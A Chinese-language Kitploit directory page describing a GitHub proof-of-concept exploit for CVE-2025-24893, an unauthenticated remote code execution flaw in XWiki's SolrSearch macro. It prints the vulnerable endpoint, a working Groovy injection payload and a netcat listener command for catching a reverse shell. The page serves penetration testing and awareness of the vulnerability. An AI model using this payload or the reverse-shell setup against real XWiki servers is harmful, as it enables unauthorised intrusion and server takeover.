Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC — CVE-2025-24893 是 XWiki(版本 < 15.10.11、16.4.1、16.5.0RC1)中的一个严重的未认证远程代码执行漏洞,由 SolrSearch 宏中 Groovy 表达式处理不当所致。 | Kitploit
工具/GitHubGitHub/dollarboysushil/cve-2025-24893-xwiki-unauthenticated-rce-exploit-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubdollarboysushil/cve-2025-24893-xwiki-unauthenticated-rce-exploit-poc

CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC

CVE-2025-24893 是 XWiki(版本 < 15.10.11、16.4.1、16.5.0RC1)中的一个严重的未认证远程代码执行漏洞,由 SolrSearch 宏中 Groovy 表达式处理不当所致。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库网站
1711年前尚未审核

CVE-2025-24893 - XWiki 未认证 RCE 漏洞利用 PoC

⚠️ XWiki 中的未认证远程代码执行
🛠️ PoC 实现者:@dollarboysushil

💡 概述

CVE-2025-24893 是 XWiki 中的一个严重 RCE 漏洞,由 SolrSearch 宏中的不安全 Groovy 表达式处理导致。攻击者可通过构造的 GET 请求注入 Groovy 代码,从而实现远程代码执行(无需认证)。

  • 严重性: 严重(CVSS 9.8)
  • 受影响版本: < 15.10.11、16.4.1、16.5.0RC1

🛠 技术分析

该漏洞位于 XWiki 的 SolrSearch 宏(Main.SolrSearch)中,该宏使用不安全的 Groovy 求值来处理搜索输入。该宏未能对用户提供的输入进行净化,从而导致任意代码执行。

🔥 易受攻击的端点

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

攻击者可以向 text 参数注入 Groovy 代码,由于宏系统内的输入处理不当,该参数会在服务器端被求值。

💥 示例载荷

root@kitploit:~
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}

这会导致在易受攻击的 XWiki 实例上实现未认证的远程代码执行(RCE)。

🔬 概念验证(PoC)演示

🧪 目标环境

易受攻击的目标是运行版本 15.10.8 的 XWiki 实例,该版本受 CVE-2025-24893 影响。

易受攻击的 XWiki 界面


📡 准备监听器

在攻击者的机器上启动一个 Netcat 监听器,以捕获反向 shell 连接:

root@kitploit:~
nc -lvnp 1337

Netcat 监听器在端口 1337 上处于活动状态


🚀 启动漏洞利用

运行漏洞利用脚本 CVE-2025-24893-dbs.py,向易受攻击的 XWiki 端点发送基于 Groovy 的 RCE 载荷。

运行漏洞利用脚本


💻 成功获取远程 Shell

成功执行后,反向 shell 将连接回监听器,使攻击者获得对服务器的远程访问权限。

已获取反向 Shell


📚 参考资料

  • OffSec 博客:CVE-2025-24893 XWiki Groovy RCE
  • NVD 条目:CVE-2025-24893
下载工具